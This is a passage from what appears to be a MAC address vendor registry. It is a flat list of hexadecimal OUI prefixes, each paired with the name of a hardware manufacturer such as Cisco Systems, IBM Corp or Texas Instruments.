Technology Inc. 00134A Engim, Inc. 0012E5 Time America, Inc. 0012DC SunCorp Industrial Limited 0012D0 Gossen-Metrawatt-GmbH 0012F9 URYU SEISAKU, LTD. 001304 Flaircomm Technologies Co. LTD 00131F NxtPhase T&D, Corp. 001319 Cisco Systems, Inc 00131C LiteTouch, Inc. 001353 HYDAC Filtertechnik GMBH 001275 Sentilla Corporation 001276 CG Power Systems Ireland Limited 001271 Measurement Computing Corp 001273 Stoke Inc 001269 Value Electronics 001250 Tokyo Aircaft Instrument Co., Ltd. 001252 Citronix, LLC 00124B Texas Instruments 00124A Dedicated Devices, Inc. 001243 Cisco Systems, Inc 001293 ABB Switzerland Ltd. 00128C Woodward Governor 001294 SUMITOMO ELECTRIC DEVICE INNOVATIONS, INC 001296 Addlogix 00127F Cisco Systems, Inc 00127B VIA Networking Technologies, Inc. 001280 Cisco Systems, Inc 001264 daum electronic gmbh 001261 Adaptix, Inc 001260 Stanton Magnetics,inc. 001258 TechVoIP Sp z o.o. 0012B8 G2 Microsystems 0012B3 Advance Wireless Technology Corp. 0012B0 Efore Oyj (Plc) 001231 Motion Control Systems, Inc. 001224 NexQL Corporation 0012A6 Dolby Australia 0012A4 ThingMagic, LLC 0012A9 3Com Ltd 001299 Ktech Telecommunications Inc 001240 AMOI ELECTRONICS CO.,LTD 00122E Signal Technology - AISD 0011BD Bombardier Transportation 0011AA Uniclass Technology, Co., LTD 0011B1 BlueExpert Technology Corp. 001203 ActivNetworks 0011F8 AIRAYA Corp 0011F4 woori-net 0011F6 Asia Pacific Microsystems , Inc. 0011D9 TiVo 0011CF Thrane & Thrane A/S 0011D4 NetEnrich, Inc 0011D5 Hangzhou Sunyard System Engineering Co.,Ltd. 001211 Protechna Herbst GmbH & Co. KG 001219 General Datacomm LLC 001216 ICP Internet Communication Payment AG 001215 iStor Networks, Inc. 0011A6 Sypixx Networks 0011A2 Manufacturing Technology Inc 00119E Solectron Brazil 0011F0 Wideful Limited 0011F1 QinetiQ Ltd 0011ED 802 Global 0011DB Land-Cellular Corporation 0011D2 Perception Digital Ltd 0011CC Guangzhou Jinpeng Group Co.,Ltd. 0011C7 Raymarine UK Ltd 0011C9 MTT Corporation 0011B5 Shenzhen Powercom Co.,Ltd 0011BB Cisco Systems, Inc 00111C Pleora Technologies Inc. 001125 IBM Corp 00111F Doremi Labs, Inc. 00111D Hectrix Limited 001119 Solteras, Inc. 001114 EverFocus Electronics Corp. 00110E Tsurusaki Sealand Transportation Co. Ltd. 001152 Eidsvoll Electronics AS 001150 Belkin Corporation 001146 Telecard-Pribor Ltd 00114C caffeina applied research ltd. 00117E Midmark Corp 001179 Singular Technology Co. Ltd. 001173 SMART Storage Systems 00118A Viewtran Technology Limited 001184 Humo Laboratory,Ltd. 000FF4 Guntermann & Drunck GmbH 000FF8 Cisco Systems, Inc 000FF5 GN&S company 001166 Taelim Electronics Co., Ltd. 001164 ACARD Technology Corp. 001155 Sevis Systems 001141 GoodMan Corporation 00112C IZT GmbH 00110D SANBlaze Technology, Inc. 001106 Siemens NV (Belgium) 000FA1 Gigabit Systems Inc. 000F99 APAC opto Electronics Inc. 000F8E DONGYANG TELECOM CO.,LTD. 000F91 Aerotelecom Co.,Ltd. 000FD7 Harman Music Group 000FD4 Soundcraft 000FD2 EWA Technologies, Inc. 000FCF DataWind Research 000FCE Kikusui Electronics Corp. 000FE8 Lobos, Inc. 000FEB Cylon Controls 000FDC Ueda Japan Radio Co., Ltd. 000F43 Wasabi Systems Inc. 000F48 Polypix Inc. 000F50 StreamScale Limited 000F47 ROBOX SPA 000F73 RS Automation Co., Ltd 000F78 Datacap Systems Inc 000F70 Wintec Industries, inc. 000F74 Qamcom Technology AB 000F87 Maxcess International 000F80 Trinity Security Systems,Inc. 000F4E Cellink 000F3C Endeleo Limited 000F31 Allied Vision Technologies Canada Inc 000FAF Dialog Inc. 000FA5 BWA Technology GmbH 000FB2 Broadband Pacenet (India) Pvt. Ltd. 000F6D Midas Engineering 000F5F Nicety Technologies Inc. (NTS) 000F5A Peribit Networks 000F18 Industrial Control Systems 000F1D Cosmo Techs Co., Ltd. 000F1B Ego Systems Inc. 000F0F Real ID Technology Co., Ltd. 000F16 JAY HOW TECHNOLOGY CO., 000E9F TEMIC SDS GmbH 000E92 Open Telecom 000E96 Cubic Defense Applications, Inc. 000E8E SparkLAN Communications, Inc. 000E91 Navico Auckland Ltd 000F29 Augmentix Corporation 000F27 TEAL Electronics, Inc. 000E84 Cisco Systems, Inc 000E87 adp Gauselmann GmbH 000E75 New York Air Brake Corp. 000EF9 REA Elektronik GmbH 000EF6 E-TEN Information Systems Co., Ltd. 000EEA Shadong Luneng Jicheng Electronics,Co.,Ltd 000EAB Cray Inc 000EAD Metanoia Technologies, Inc. 000EAF CASTEL 000EF8 SBC ASI 000EE6 Adimos Systems LTD 000EE0 Mcharge 000EC6 ASIX ELECTRONICS CORP. 000EBF Remsdaq Limited 000DDA ALLIED TELESIS K.K. 000DD6 ITI LTD 000DD5 O'RITE TECHNOLOGY CO.,LTD 000DCD GROUPE TXCOM 000DCA Tait Electronics 000DF9 NDS Limited 000DFB Komax AG 000E00 Atrie 000DF4 Watertek Co. 000DFA Micro Control Systems Ltd. 000DFC ITFOR Inc. 000DFE Hauppauge Computer Works, Inc. 000E1B IAV GmbH 000E0F ERMME 000E10 C-guys, Inc. 000E13 Accu-Sort Systems inc. 000E0A SAKUMA DESIGN OFFICE 000E0E ESA elettronica S.P.A. 000DFD Huges Hi-Tech Inc., 000E66 Hitachi Industry & Control Solutions, Ltd. 000E68 E-TOP Network Technology Inc. 000E5E Raisecom Technology 000E56 4G Systems GmbH & Co. KG 000E55 AUVITRAN 000E7C Televes S.A. 000E73 Tpack A/S 000E72 CTS electronics 000E6E MAT S.A. (Mircrelec Advanced Technology) 000E3E Sun Optronics Inc 000E33 Shuko Electronics Co.,Ltd 000E3A Cirrus Logic 000E3B Hawking Technologies, Inc. 000DEC Cisco Systems, Inc 000DF2 Private 000DDE Joyteck Co., Ltd. 000DE2 CMZ Sistemi Elettronici 000E27 Crere Networks, Inc. 000E18 MyA Technology 000E14 Visionary Solutions, Inc. 000E53 AV TECH CORPORATION 000E48 Lipman TransAction Solutions 000D4A Steag ETA-Optik 000D4F Kenwood Corporation 000D47 Collex 000D43 DRS Tactical Systems Inc. 000D44 Audio BU - Logitech 000D3E APLUX Communications Ltd. 000D36 Wu Han Routon Electronic Co., Ltd 000D3D Hammerhead Systems, Inc. 000D9B Heraeus Electro-Nite International N.V. 000D8A Winners Electronics Co., Ltd. 000D8E Koden Electronics Co., Ltd. 000D61 Giga-Byte Technology Co., Ltd. 000D52 Comart system 000D6B Mita-Teknik A/S 000D71 boca systems 000D5A Tiesse SpA 000D3B Microelectronics Technology Inc. 000D2D NCT Deutschland GmbH 000DCF Cidra Corp. 000DC4 Emcore Corporation 000DB8 SCHILLER AG 000D7E Axiowave Networks, Inc. 000D7C Codian Ltd 000DA0 NEDAP N.V. 000D03 Matrics, Inc. 000CFF MRO-TEK Realty Limited 000CFA Digital Systems Corp 000CFD Hyundai ImageQuest Co.,Ltd. 000CEF Open Networks Engineering Ltd 000D0D ITSupported, LLC 000D06 Compulogic Limited 000CB2 UNION co., ltd. 000CB9 LEA 000CB8 MEDION AG 000CBB ISKRAEMECO 000CC0 Genera Oy 000CA8 Garuda Networks Corporation 000CA7 Metro (Suzhou) Technologies Co., Ltd. 000CBE Innominate Security Technologies AG 000CBD Interface Masters, Inc 000D1A Mustek System Inc. 000D1E Control Techniques 000CD3 Prettl Elektronik Radeberg GmbH 000CD7 Nallatech Ltd 000CD4 Positron Public Safety Systems inc. 000CEB CNMP Networks, Inc. 000CCC Aeroscout Ltd. 000CC7 Intelligent Computer Solutions Inc. 000C82 NETWORK TECHNOLOGIES INC 000C7C Internet Information Image Inc. 000C7B ALPHA PROJECT Co.,Ltd. 000C77 Life Racing Ltd 000C61 AC Tech corporation DBA Advanced Digital 000C5F Avtec, Inc. 000C4B Cheops Elektronik 000C45 Animation Technologies Inc. 000C69 National Radio Astronomy Observatory 000C64 X2 MSA Group 000C66 Pronto Networks Inc 000C2A OCTTEL Communication Co., Ltd. 000C22 Double D Electronics Ltd 000C1C MicroWeb Co., Ltd. 000C0F Techno-One Co., Ltd 000C4E Winbest Technology CO,LT 000C5A IBSmm Embedded Electronics Consulting 000C5E Calypso Medical 000CA0 StorCase Technology, Inc. 000C99 HITEL LINK Co.,Ltd 000C8D MATRIX VISION GmbH 000C89 AC Electric Vehicles, Ltd. 000C88 Apache Micro Peripherals, Inc. 000C3C MediaChorus, Inc. 000C38 TelcoBridges Inc. 000C27 Sammy Corporation 000C05 RPA Reserch Co., Ltd. 000BF2 Chih-Kan Technology Co., Ltd. 000BEB Systegra AG 000BEF Code Corporation 000BDF Shenzhen RouterD Networks Limited 000BE6 Datel Electronics 000BF5 Shanghai Sibo Telecom Technology Co.,Ltd 000BFE CASTEL Broadband Limited 000B6D SOLECTRON JAPAN NAKANIIDA 000B62 ib-mohnen KG 000B64 Kieback & Peter GmbH & Co KG 000B67 Topview Technology Corporation 000BC4 BIOTRONIK GmbH & Co 000BAF WOOJU COMMUNICATIONS Co,.Ltd 000BB6 Metalligence Technology Corp. 000BB3 RiT technologies Ltd. 000BB7 Micro Systems Co.,Ltd. 000BAB Advantech Technology (CHINA) Co., Ltd. 000B94 Digital Monitoring Products, Inc. 000B7D SOLOMON EXTREME INTERNATIONAL LTD. 000BAE Vitals System Inc. 000BD9 General Hydrogen 000BBA Harmonic, Inc 000B57 Silicon Laboratories 000B51 Micetek International Inc. 000B53 INITIUM Co., Ltd. 000B48 sofrel 000B4A Visimetrics (UK) Ltd 000ADE Happy Communication Co., Ltd. 000AE2 Binatone Electronics International, Ltd 000AD4 CoreBell Systems Inc. 000ACA YOKOYAMA SHOKAI CO.,Ltd. 000ACE RADIANTECH, INC. 000AFB Ambri Limited 000AFF Kilchherr Elektronik AG 000B37 MANUFACTURE DES MONTRES ROLEX SA 000B2D Danfoss Inc. 000B1E KAPPA opto-electronics GmbH 000B1C SIBCO bv 000AF8 American Telecare Inc. 000B17 MKS Instruments 000AAC TerraTec Electronic GmbH 000AB8 Cisco Systems, Inc 000AA3 SHIMAFUJI ELECTRIC CO.,LTD. 000AA7 FEI Electron Optics 000AA6 Hochiki Corporation 000A94 ShangHai cellink CO., LTD 000A97 SONICblue, Inc. 000A92 Presonus Corporation 000A85 PLAT'C2,Inc 000A83 SALTO SYSTEMS S.L. 000A86 Lenze 004252 RLX Technologies 000A50 REMOTEK CORPORATION 000A58 Freyer & Siegel Elektronik GmbH & Co. KG 000A4E UNITEK Electronics INC. 000A3D Elo Sistemas Eletronicos S.A. 000A64 Eracom Technologies 000A62 Crinis Networks, Inc. 000A6A SVM Microwaves s.r.o. 000A66 MITSUBISHI ELECTRIC SYSTEM & SERVICE CO.,LTD. 000AC7 Unication Group 000ABF HIROTA SS 000ABC Seabridge Ltd. 000A70 MPLS Forum 000A72 STEC, INC. 000A71 Avrio Technologies, Inc 000A9A Aiptek International Inc 000A46 ARO WELDING TECHNOLOGIES SAS 000A3F Data East Corporation 000A31 HCV Consulting 000A20 SVA Networks, Inc. 000A24 Octave Communications 000A19 Valere Power, Inc. 000A11 ExPet Technologies, Inc 000A0F Ilryung Telesys, Inc 000A0C Scientific Research Corporation 0009F6 Shenzhen Eastern Digital Tech Ltd. 000A01 SOHOware, Inc. 0009E5 Hottinger Brüel & Kjaer GmbH 0009DE Samjin Information & Communications Co., Ltd. 0009E0 XEMICS S.A. 0009CA iMaxNetworks(Shenzhen)Limited. 0009CF iAd GmbH 0009B9 Action Imaging Solutions 0009AC LANVOICE 0009B1 Kanematsu Electronics, Ltd. 0009B0 Onkyo Technology K.K. 0009AB Netcontrol Oy 00099D Haliplex Communications 00099E Testech, Inc. 000999 CP GEORGES RENAULT 000994 Cronyx Engineering 000988 Nudian Electron Co., Ltd. 00098E ipcas GmbH 00097C Cisco Systems, Inc 00097B Cisco Systems, Inc 0009C1 PROCES-DATA A/S 0009BB MathStar, Inc. 0009EC Daktronics, Inc. 0009EE MEIKYO ELECTRIC CO.,LTD 0009E7 ADC Techonology 00093F Double-Win Enterpirse CO., LTD 00093C Jacques Technologies P/L 000935 Sandvine Incorporated 000936 Ipetronik GmbH & Co. KG 000937 Inventec Appliance Corp 000968 TECHNOVENTURE, INC. 000961 Switchgear and Instrumentation Ltd 000960 YOZAN Inc. 000956 Network Systems Group, Ltd. (NSG) 00090E Helix Technology Inc. 000900 TMT 0008FD BlueKorea Co., Ltd. 0008F8 UTC CCS 0008DE 3UP Systems 0008E0 ATO Technology Ltd. 0008E4 Envenergy Inc 0008E3 Cisco Systems, Inc 0008E5 IDK Corporation 0008D9 Mitadenshi Co.,LTD 000979 Advanced Television Systems Committee, Inc. 000963 Dominion Lasercom Inc. 000966 TRIMBLE EUROPE BV 000949 Glyph Technologies Inc. 000948 Vista Control Systems, Corp. 000946 Cluster Labs GmbH 0008F3 WANY 00092A MYTECS Co.,Ltd. 000925 VSN Systemen BV 000913 SystemK Corporation 00082C Homag AG 000821 Cisco Systems, Inc 000822 InPro Comm 00081D Ipsil, Incorporated 000823 Texa Corp. 000828 Koei Engineering Ltd. 00082D Indus Teqsite Private Limited 000820 Cisco Systems, Inc 000824 Nuance Document Imaging 000814 TIL Technologies 000899 Netbind, Inc. 0008A0 Stotz Feinmesstechnik GmbH 000891 Lyan Inc. 000892 EM Solutions 00088C Quanta Network Systems Inc. 00088A Minds@Work 000887 Maschinenfabrik Reinhausen GmbH 00086C Plasmon LMS 000868 PurOptix 000869 Command-e Technology Co.,Ltd. 000862 NEC Eluminant Technologies, Inc. 000861 SoftEnergy Co., Ltd. 00084F Qualstar Corporation 000877 Liebert-Hiross Spa 00087B RTX Telecom A/S 000876 SDSystem 000870 Rasvia Systems, Inc. 00086E Hyglo AB 000803 Cos Tron 000805 Techno-Holon Corporation 0007FD LANergy Ltd. 0007FE Rigaku Corporation 0008AE PacketFront Network Products AB 0008A7 iLogic Inc. 0008D5 Vanguard Networks Solutions, LLC 0008CD With-Net Inc 0008CC Remotec, Inc. 0008D1 KAREL INC. 0008C3 Contex A/S 0008BC Ilevo AB 0008BD TEPG-US 000854 Netronix, Inc. 00085C Shanghai Dare Technologies Co. Ltd. 000765 Jade Quantum Technologies, Inc. 000754 Xyterra Computing, Inc. 000757 Topcall International AG 00074C Beicom Inc. 000753 Beijing Qxcomm Technology Co., Ltd. 00074D Zebra Technologies Corp. 0007BF Armillaire Technologies, Inc. 0007BB Candera Inc. 0007BD Radionet Ltd. 0007C4 JEAN Co. Ltd. 0007C3 Thomson 000780 Bluegiga Technologies OY 00076E Sinetica Corporation Limited 00076F Synoptics Limited 000773 Ascom Powerline Communications Ltd. 00076C Daehanet, Inc. 00075D Celleritas Inc. 0007B6 Telecom Technology Ltd. 0007B7 Samurai Ind. Prods Eletronicos Ltda 0007B0 Office Details, Inc. 0007A5 Y.D.K Co. Ltd. 0007CD Kumoh Electronic Co, Ltd 0007CF Anoto AB 0007D2 Logopak Systeme GmbH & Co. KG 0007C9 Technol Seven Co., Ltd. 0007C7 Synectics Systems Limited 00079C Golden Electronics Technology Co., Ltd. 00078E Garz & Fricke GmbH 000777 Motah Ltd. 0007D9 Splicecom 0007DA Neuro Telecom Co., Ltd. 0007E4 SoftRadio Co., Ltd. 000734 ONStor, Inc. 00073F Woojyun Systec Co., Ltd. 000728 Neo Telecom 00072C Fabricom 00072D CNSystems 00072F Intransa, Inc. 000732 AAEON Technology Inc. 000725 Bematech International Corp. 000723 ELCON Systemtechnik GmbH 00071D Satelsa Sistemas Y Aplicaciones De Telecomunicaciones, S.A. 000720 Trutzschler GmbH & Co. KG 000724 Telemax Co., Ltd. 00071B CDVI Americas Ltd 000715 General Research of Electronics, Inc. 0006B1 Sonicwall 0006AD KB Electronics Ltd. 0006AF Xalted Networks 0006A7 Primarion 0006A9 Universal Instruments Corp. 00069E UNIQA, Inc. 0006C8 Sumitomo Metal Micro Devices, Inc. 0006C0 United Internetworks, Inc. 0006D5 Diamond Systems Corp. 0005EA Rednix 0006C9 Technical Marketing Research, Inc. 0006FD Comjet Information Systems Corp. 0006F9 Mitsui Zosen Systems Research Inc. 0006F1 Optillion 0006E0 MAT Co., Ltd. 0006D7 Cisco Systems, Inc 000737 Soriya Co. Ltd. 000675 Banderacom, Inc. 00067B Toplink C&C Corporation 000670 Upponetti Oy 00066F Korea Data Systems 000698 egnite GmbH 00069C Transmode Systems AB 000686 ZARDCOM Co., Ltd. 000689 yLez Technologies Pte Ltd 000681 Goepel Electronic GmbH 00D0B9 MICROTEK INTERNATIONAL, INC. 00D05F VALCOM, INC. 000613 Kawasaki Microelectronics Incorporated 0005D3 eProduction Solutions, Inc. 000604 @Track Communications, Inc. 000606 RapidWAN, Inc. 00063B Arcturus Networks Inc. 000633 Cross Match Technologies GmbH 000626 MWE GmbH 000603 Baker Hughes Inc. 000607 Omni Directional Control Technology Inc. 0005F7 Analog Devices, Inc. 000668 Vicon Industries Inc. 00066D Compuprint S.P.A. 000658 Helmut Fischer GmbH Institut für Elektronik und Messtechnik 000649 3M Deutschland GmbH 000643 SONO Computer Co., Ltd. 00063E Opthos Inc. 000618 DigiPower Manufacturing Inc. 000620 Serial System Ltd. 000617 Redswitch Inc. 000540 FAST Corporation 00053C XIRCOM 000544 Valley Technologies, Inc. 00052E Cinta Networks 00052F Leviton Network Solutions 000556 360 Systems 000559 Intracom S.A. 000551 F & S Elektronik Systeme GmbH 00054D Brans Technologies, Inc. 000547 Starent Networks 00054E Philips 000546 KDDI Network & Solultions Inc. 0005A2 CELOX Networks 0005AA Moore Industries International Inc. 0005AE Mediaport USA 0005B0 Korea Computer Technology Co., Ltd. 0005B2 Medison Co., Ltd. 000579 Universal Control Solution Corp. 00057F Acqis Technology 000573 Cisco Systems, Inc 000575 CDS-Electronics BV 00056B C.P. Technology Co., Ltd. 000560 LEADER COMM.CO., LTD 00055E Cisco Systems, Inc 0005E2 Creativ Network Technologies 0005C8 VERYTECH 0005CB ROIS Technologies, Inc. 0005CD D&M Holdings Inc. 000597 Eagle Traffic Control Systems 0005B5 Broadcom Technologies 00058C Opentech Inc. 000596 Genotech Co., Ltd. 0005E7 Netrake an AudioCodes Company 0005F4 System Base Co., Ltd. 0005E1 Trellis Photonics, Ltd. 00059C Kleinknecht GmbH, Ing. Büro 0004BE OptXCon, Inc. 0004C1 Cisco Systems, Inc 0004C4 Audiotonix Group Limited 0004B7 AMB i.t. Holding 0004B9 S.I. Soubou, Inc. 0004BB Bardac Corporation 0004BC Giantec, Inc. 0004AF Digital Fountain, Inc. 0004B2 ESSEGI SRL 0004B4 CIAC 00053B Harbour Networks Ltd., Co. Beijing 000528 New Focus, Inc. 000524 BTL System (HK) Limited 000522 LEA*D Corporation, Inc. 000520 Smartronix, Inc. 000518 Jupiters Technology 0004D9 Titan Electronics, Inc. 0004D8 IPWireless, Inc. 0004D6 Takagi Industrial Co., Ltd. 0004D1 Drew Technologies, Inc. 0004D0 Softlink s.r.o. 0004A9 SandStream Technologies, Inc. 00049C Surgient Networks, Inc. 00049D Ipanema Technologies 000460 Knilink Technology, Inc. 00048F TD Systems Corporation 000495 Tejas Networks India Limited 000487 Cogency Semiconductor, Inc. 000468 Vivity, Inc. 00046F Digitel S/A Industria Eletronica 000469 Innocom, Inc. 0004EB Paxonet Communications, Inc. 0004EF Polestar Corp. 008087 OKI ELECTRIC INDUSTRY CO., LTD 000505 Systems Integration Solutions, Inc. 0004FE Pelago Networks 000514 KDT Systems Co., Ltd. 00050B SICOM Systems, Inc. 0003E1 Winmate Communication, Inc. 0003E4 Cisco Systems, Inc 0003DC Lexar Media, Inc. 0003D8 iMPath Networks, Inc. 0003D5 Advanced Communications Co., Ltd. 0003D6 RADVision, Ltd. 0003F7 Plast-Control GmbH 0003FC Intertex Data AB 0003EF Oneline AG 0003F1 Cicada Semiconductor, Inc. 0003ED Shinkawa Electric Co., Ltd. 0003D4 Alloptic, Inc. 0003CE ETEN Technologies, Inc. 0003C8 CML Emergency Services 000461 EPOX Computer Co., Ltd. 000462 DAKOS Data & Communication Co., Ltd. 00045F Avalue Technology, Inc. 00042A Wireless Networks, Inc. 000419 Fibercycle Networks, Inc. 00041C ipDialog, Inc. 000418 Teltronic S.A.U. 000456 Cambium Networks Limited 000458 Fusion X Co., Ltd. 00044F Schubert System Elektronik Gmbh 000440 cyberPIXIE, Inc. 00043C SONOS Co., Ltd. 00042C Minet, Inc. 000446 CYZENTECH Co., Ltd. 00044A iPolicy Networks, Inc. 000370 NXTV, Inc. 000402 Nexsan Technologies, Ltd. 000355 TeraBeam Internet Systems 000354 Fiber Logic Communications 000350 BTICINO SPA 00034E Pos Data Company, Ltd. 000348 Norscan Instruments, Ltd. 0003C3 Micronik Multimedia 0003C0 RFTNC Co., Ltd. 0003BD OmniCluster Technologies, Inc. 0003B8 NetKit Solutions, LLC 0003B7 ZACCESS Systems 0003B0 Xsense Technology Corp. 0003AA Watlow 0003A8 IDOT Computers, Inc. 0003A0 Cisco Systems, Inc 0003A2 Catapult Communications 00039C OptiMight Communications, Inc. 000346 Hitachi Kokusai Electric, Inc. 000344 Tietech.Co., Ltd. 000343 Martin Professional A/S 000335 Mirae Technology 000336 Zetes Technologies 000337 Vaone, Inc. 00033B TAMI Tech Co., Ltd. 00032D IBASE Technology, Inc. 00032F Global Sun Technology, Inc. 000385 Actelis Networks, Inc. 00B052 Atheros Communications 000314 Teleware Network Systems 000377 Gigabit Wireless 000369 Nippon Antenna Co., Ltd. 000373 Aselsan A.S 000365 Kira Information & Communications, Ltd. 0002F1 Pinetron Co., Ltd. 0002ED DXO Telecom Co., Ltd. 0002EC Maschoff Design Engineering 0002E6 Gould Instrument Systems, Inc. 0002E4 JC HYUN Systems, Inc. 0002DE Astrodesign, Inc. 0002E2 NDC Infared Engineering 0002DC Fujitsu General Limited 0002E1 Integrated Network Corporation 0002D7 EMPEG Ltd 000087 HITACHI, LTD. 000258 Flying Packets Communications 000255 IBM Corp 000252 Carrier Corporation 00024E Datacard Group 000242 Videoframe Systems 000244 SURECOM Technology Co. 000269 Nadatel Co., Ltd 000264 AudioRamp.com 00025F Nortel Networks 00025C SCI Systems (Kunshan) Co., Ltd. 0002D3 NetBotz, Inc. 0002DA ExiO Communications, Inc. 0002D4 PDA Peripherals, Inc. 0002D6 NICE Systems 0002C6 Data Track Technology PLC 00027D Cisco Systems, Inc 00027C Trilithic, Inc. 000275 SMART Technologies, Inc. 000291 Open Network Co., Ltd. 00028B VDSL Systems OY 00028C Micrel-Synergy Semiconductor 00028D Movita Technologies, Inc. 0002A6 Effinet Systems Co., Ltd. 000299 Apex, Inc. 000298 Broadframe Corporation 000297 C-COR.net 0002F8 SEAKR Engineering, Inc. 0002F7 ARM 00D024 Cognex Corporation 0002C1 Innovative Electronic Designs, Inc. 0002C0 Bencent Tzeng Industry Co., Ltd. 0001D5 HAEDONG INFO & COMM CO., LTD 0001D7 F5 Networks, Inc. 0001DE Trango Systems, Inc. 0001DC Activetelco 0001CF Alpha Data Parallel Systems, Ltd. 0001D0 VitalPoint, Inc. 000207 VisionGlobal Network Corp. 000208 Unify Networks, Inc. 000204 Bodmann Industries Elektronik GmbH 0001F9 TeraGlobal Communications Corp. 0001FB DoTop Technology, Inc. 0001F8 TEXIO TECHNOLOGY CORPORATION 00020D Micronpc.com 000211 Nature Worldwide Technology Corp. 000212 SierraCom 000217 Cisco Systems, Inc 0001BA IC-Net, Inc. 0001B0 Fulltek Technology Co., Ltd. 0001A9 BMW AG 0001AA Airspan Communications, Ltd. 00019E ESS Technology, Inc. 00017D ThermoQuest 000181 Nortel Networks 000229 Adtec Corporation 00022D Agere Systems 000226 XESystems, Inc. 000225 One Stop Systems 000220 CANON FINETECH INC. 0001E8 Force10 Networks, Inc. 0001E9 Litton Marine Systems B.V. 0001E5 Supernet, Inc. 0001D4 Leisure Time, Inc. 0001DD Avail Networks 0001C7 Cisco Systems, Inc 0001BE Gigalink Co., Ltd. 0001B1 General Bandwidth 0001BF Teleforce Co., Ltd. 0001B4 Wayport, Inc. 00023E Selta Telematica S.p.a 000241 Amer.com 00017A Chengdu Maipu Electric Industrial Co., Ltd. 000238 Serome Technology, Inc. 000194 Capital Equipment Corporation 000198 Darim Vision 000121 WatchGuard Technologies, Inc. 000129 DFI Inc. 000119 RTUnet (Australia) 000122 Trend Communications, Ltd. 00011A Hoffmann und Burmeister GbR 000124 Acer Incorporated 00010A CIS TECHNOLOGY INC. 000162 Cygnet Technologies, Inc. 000167 HIOKI E.E. CORPORATION 000168 VITANA CORPORATION 00015F DIGITAL DESIGN GmbH 000164 Cisco Systems, Inc 0030EE DSG Technology, Inc. 00309E WORKBIT CORPORATION. 0030DE WAGO Kontakttechnik GmbH 00303E Radcom Ltd. 0030D7 Innovative Systems, L.L.C. 00301B SHUTTLE, INC. 000105 Beckhoff Automation GmbH 00B017 InfoGear Technology Corp. 00B04A Cisco Systems, Inc 00B048 Marconi Communications Inc. 000154 G3M Corporation 000152 CHROMATEK INC. 000150 GILAT COMMUNICATIONS, LTD. 000151 Ensemble Communications 00012B TELENET Co., Ltd. 00013F Neighbor World Co., Ltd. 00012C Aravox Technologies, Inc. 000142 Cisco Systems, Inc 00B0CE Viveris Technologies 00B01C Westport Technologies 00B02D ViaGate Technologies, Inc. 000115 EXTRATECH CORPORATION 00010D Teledyne DALSA Inc. 000101 Private 000185 Hitachi Aloka Medical, Ltd. 0001A2 Logical Co., Ltd. 0030FD INTEGRATED SYSTEMS DESIGN 0030B9 ECTEL 00307D GRE AMERICA, INC. 003021 HSING TECH. ENTERPRISE CO.,LTD 00303A MAATEL 00302C SYLANTRO SYSTEMS CORPORATION 0030DF KB/TEL TELECOMUNICACIONES 00304E BUSTEC PRODUCTION LTD. 003063 SANTERA SYSTEMS, INC. 003030 HARMONIX CORPORATION 0030A3 Cisco Systems, Inc 0030DD INDIGITA CORPORATION 003099 BOENIG UND KALLENBACH OHG 0030F2 Cisco Systems, Inc 003051 ORBIT AVIONIC & COMMUNICATION 003008 AVIO DIGITAL, INC. 00301D SKYSTREAM, INC. 0030A4 Woodwind Communications System 00303B PowerCom Technology 0030BC Optronic AG 0030B8 RiverDelta Networks 003071 Cisco Systems, Inc 0030EF NEON TECHNOLOGY, INC. 003096 Cisco Systems, Inc 003039 SOFTBOOK PRESS 0030B5 Tadiran Microwave Networks 003020 TSI, Inc.. 003095 Procomp Informatics, Ltd. 0030CA Discovery Com 0030CE Zaffire 00307B Cisco Systems, Inc 003088 Ericsson 00308E CROSS MATCH TECHNOLOGIES, INC. 003027 KERBANGO, INC. 003033 ORIENT TELECOM CO., LTD. 0030BA AC&T SYSTEM CO., LTD. 00D0E0 DOOIN ELECTRONICS CO. 00D033 DALIAN DAXIAN NETWORK 00D0D6 AETHRA TELECOMUNICAZIONI 00D063 Cisco Systems, Inc 00D0F8 FUJIAN STAR TERMINAL 00D0D0 ZHONGXING TELECOM LTD. 00D053 CONNECTED SYSTEMS 00D097 Cisco Systems, Inc 00D08E Grass Valley, A Belden Brand 00D056 SOMAT CORPORATION 00D047 XN TECHNOLOGIES 00D055 KATHREIN-WERKE KG 00D03B VISION PRODUCTS PTY. LTD. 00D0B3 DRS Technologies Canada Ltd 00D000 FERRAN SCIENTIFIC, INC. 00D083 INVERTEX, INC. 00D0BA Cisco Systems, Inc 00D0E4 Cisco Systems, Inc 00D08B ADVA Optical Networking Ltd. 00D05A SYMBIONICS, LTD. 00D0ED XIOX 00D0AF CUTLER-HAMMER, INC. 00D0B0 BITSWITCH LTD. 00D030 Safetran Systems Corp 00302A SOUTHERN INFORMATION 0030E1 Network Equipment Technologies, Inc. 003001 SMP 00D052 ASCEND COMMUNICATIONS, INC. 00D0AD TL INDUSTRIES 00D0A4 ALANTRO COMMUNICATIONS 00D092 GLENAYRE WESTERN MULTIPLEX 00D079 Cisco Systems, Inc 00D021 REGENT ELECTRONICS CORP. 00D09F NOVTEK TEST SYSTEMS 00D0FE ASTRAL POINT 00D0E7 VCON TELECOMMUNICATION LTD. 00D084 NEXCOMM SYSTEMS, INC. 00D099 Elcard Wireless Systems Oy 00D01B MIMAKI ENGINEERING CO., LTD. 00D00D MICROMERITICS INSTRUMENT 00D04A PRESENCE TECHNOLOGY GMBH 00D098 Photon Dynamics Canada Inc. 00D0BE EMUTEC INC. 00D0F4 CARINTHIAN TECH INSTITUTE 00D07D COSINE COMMUNICATIONS 00D0B8 Iomega Corporation 00509D THE INDUSTREE B.V. 00506D VIDEOJET SYSTEMS 00503F ANCHOR GAMES 005032 PICAZO COMMUNICATIONS, INC. 00504D Tokyo Electron Device Limited 00D054 SAS INSTITUTE INC. 00D009 HSING TECH. ENTERPRISE CO. LTD 00D0D4 V-BITS, INC. 00D074 TAQUA SYSTEMS, INC. 00D0C7 PATHWAY, INC. 00D07A AMAQUEST COMPUTER CORP. 00500A IRIS TECHNOLOGIES, INC. 005074 ADVANCED HI-TECH CORP. 005070 CHAINTECH COMPUTER CO., LTD. 00509C BETA RESEARCH 005023 PG DESIGN ELECTRONICS, INC. 0050B1 GIDDINGS & LEWIS 00509E Les Technologies SoftAcoustik Inc. 005071 AIWA CO., LTD. 00505F BRAND INNOVATORS 0050B4 SATCHWELL CONTROL SYSTEMS, LTD 0050D0 MINERVA SYSTEMS 0050D8 UNICORN COMPUTER CORP. 0050B2 BRODEL GmbH 009076 FMT AIRCRAFT GATE SUPPORT SYSTEMS AB 009017 Zypcom, Inc 009049 ENTRIDIA CORPORATION 009043 Tattile SRL 0050D6 ATLAS COPCO TOOLS AB 005082 FORESSON CORPORATION 